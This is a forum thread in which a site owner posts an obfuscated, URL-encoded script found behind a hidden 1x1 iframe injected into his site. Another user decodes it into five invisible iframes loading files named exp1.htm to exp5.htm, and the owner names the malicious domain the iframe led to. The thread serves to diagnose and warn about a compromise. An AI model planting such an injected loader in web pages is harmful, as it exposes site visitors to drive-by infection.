script added to my site - but not by me!

[franky]

Could someone help me out and tell me what this is or does:<html><body><script>document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%34%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%35%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e"));</script></body></html>

[pulpfiction]

javascript "unescape" function is to convert a string from URL-encoded form...http://www.javascripter.net/faq/unescape.htm

[pulpfiction]

When you put space between two encoded text [%3c %69 ......] then it gave me this....

< i f r a m e s r c = " e x p 1 . h t m " w i d t h = " 1 " h e i g h t = " 1 " > < / i f r a m e > < i f r a m e s r c = " e x p 2 . h t m " w i d t h = " 1 " h e i g h t = " 1 " > < / i f r a m e > < i f r a m e s r c = " e x p 3 . h t m " w i d t h = " 1 " h e i g h t = " 1 " > < / i f r a m e > < i f r a m e s r c = " e x p 4 . h t m " w i d t h = " 1 " h e i g h t = " 1 " > < / i f r a m e > < i f r a m e s r c = " e x p 5 . h t m " w i d t h = " 1 " h e i g h t = " 1 " > < / i f r a m e >

[franky]

Could someone help me out and tell me what this is or does:<html><body><script>document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%34%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%35%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e"));</script></body></html>

Sorry guys I'll give it another go:Avg was poping up for me when I was on my site - so I was worried. I looked at the source code and found a script. It (the above script that I posted first) was found in the code that I found at a link/url that I found in an iframe that was at the top of my site - the iframe was 1 by 1 in size.It (the 1 by 1 in size iframe code/script) was not actualy put on my site (in my htm code) by me.I can now see <img src='http://127.0.0.1:1025/bug.cgi'> is in its place. The iframe on my site lead to http://prevedtraf.biz/strong/061/ which itself seems to have iframs 1 by 1 in size.What does it all mean? :)P.S.Just googled the site http://prevedtraf.biz - and got lots of "This site may harm your computer." - so be carefule out there...